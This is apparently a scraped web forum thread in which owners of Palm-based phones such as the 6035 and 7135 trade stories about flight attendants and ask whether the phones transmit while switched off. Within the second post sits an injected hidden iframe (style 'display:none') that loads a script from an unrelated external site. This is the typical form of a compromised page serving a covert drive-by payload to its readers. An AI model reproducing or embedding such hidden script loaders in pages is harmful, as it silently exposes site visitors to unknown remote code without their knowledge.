I've been asked several times to discontinue using my 6035 while flying United and American.
Has anyone researched whether or not the phone transmits anything while the phone is off?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
You're right they do need to be educated. I had one flight attendant that refused to let me use the phone for anything despite my explaining that the phone was off.
Apparently if you can send and receive pages than the airlines won't let you use it.
I have found that if you show them that the phone is off (Phone screen in Palm) they understand. I had some issues when the phone first came out, but nothing in a while.
i would say there will be alot more "static" about the 7135 than the 6035.
6035 looks like a "palm" when open.
7135 always looks like a "phone". ok, a supersmartbeatuifulphone, but still a "phone"
i don't think the "education" will be in place for a loooong while.

Now that's a good point!

I flew twice Monday with the 7135 without incident. If anyone asks, you're never more than one tap (on the Dialer silkscreen) away from a big bright screen that tells you, "Phone is Off." That oughta persuade the persuadable.
Back in July I flew to San Fran on AA. The flight attendant stopped and asked if my 6035 was "one of those Palm phones". I said yes and told her the phone was turned off. All she said was "thank you"...
I guess since I have NEVER even been on a plane (yet) I won't have to worry about this for a while (I have been to the airport 3 times though... oh boy!). My first flight will probably be to go to Vegas... hopefully with my 7135 (I'll be doing my blackjack drills using rlwhitt's app!). :drink1

Well, naturally. The phone's transmitter must be on to send and receive pages. You won't be able to receive or send pages (by this I assume you mean SMS) if the phone is off.
Never had an attendant need more convincing than the dialer screen. My Blackberry has a friendly screen just like it that is obviously for showing to flight attendants.
You shouldn't even be using the PALM side during takeoff and landing, when ALL electronic devices are banned.
The i705 (and Palm VII) are technically two-way pagers, so they are covered by that part of the rules, and an attendant that doesn't know about those devices isn't paying attention (Southwest FA's got briefed SPECIFICALLY on the Palm VII when it came out-- I don't know if they got updated for the i705, because their info is now inaccurate (they got told antenna up == bad.)

I had one of the first motorola 2-way pagers, and I remember someone asking specifically if they should turn it off or not when flying. The response was great: "Yes, you should. Not because it's going to interfere with the flight systems, although that's what they're going to tell you, but because the tower really doesn't like to see the pager whipping past at 500MPH."
Imagine the countless cell sites you'd be blowing past. Sector 1! Sector 52! Sector 315! Hmm.... I wonder how well the phone will balance with the keyboard on the cheapo trays since it connects with a cable, and not the keyboard itself = more room needed.
